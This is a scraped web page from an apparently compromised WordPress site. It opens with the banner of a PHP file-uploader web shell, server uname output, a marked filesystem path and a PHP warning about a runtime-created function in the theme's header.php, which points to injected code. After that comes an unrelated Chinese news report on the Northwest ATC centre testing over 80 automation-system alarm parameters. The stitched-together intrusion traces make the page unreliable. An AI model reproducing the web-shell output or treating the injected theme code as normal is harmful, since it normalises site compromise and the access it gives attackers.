PHP Uploader - By Phenix-TN & Mr.Anderson
Linux iZwz91hdhujjzqy9icuvwuZ 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64
okokok/www/wwwroot/aircn/new_wordpress/wordpressokokok
Warning: Use of undefined constant itongtong - assumed 'itongtong' (this will throw an Error in a future version of PHP) in /www/wwwroot/aircn/new_wordpress/wordpress/wp-content/themes/newsbulk/header.php(29) : runtime-created function on line 1

为进一步强化设备安全运行,提升空管自动化系统安全运行裕度,全面满足管制业务需求,西北空管局空管中心技保中心自动化数据室开展为期一个月的自动化系统告警参数梳理测试工作。

作为空管自动化系统的关键功能之一,一直以来,系统的各类告警提示与管制运行安全息息相关,任何告警参数的不合理变更或参数异常,都可能对航班管制判断造成影响。此次自动化数据室梳理告警参数工作,主要围绕主备用自动化系统运行平台在用软件版本展开,在涵盖了管制日常业务的基础上,同时新增了S模式与ADS-B信号相关参数有效性的告警测试验证,涉及告警参数共计80余项。针对这80余项系统告警参数,前期,自动化数据室技术人员制定了详细的测试方案,包括告警文件,参数路径,参数范围及有效性验证等,并开展安全评估,梳理可能存在的风险。针对每一项参数,技术人员都进行了多种情况下的模拟测试验证,并依靠充分验证和大量测试,组织形成准确可靠的告警参数梳理报告。最终,在自动化系统厂家的远程协助下,自动化数据室全体技术人员共同努力,于近期顺利完成了所有关键性告警参数的梳理测试工作。

此次测试工作,为接下来针对告警参数开展进一步的配置情况分析与告警参数优化工作做好了充分的先行准备,为给管制业务提供更精准、更可靠的技术支持打下了坚实基础。

供稿:西北空管局技保中心,通讯员:张满 

作者 一潼

发表回复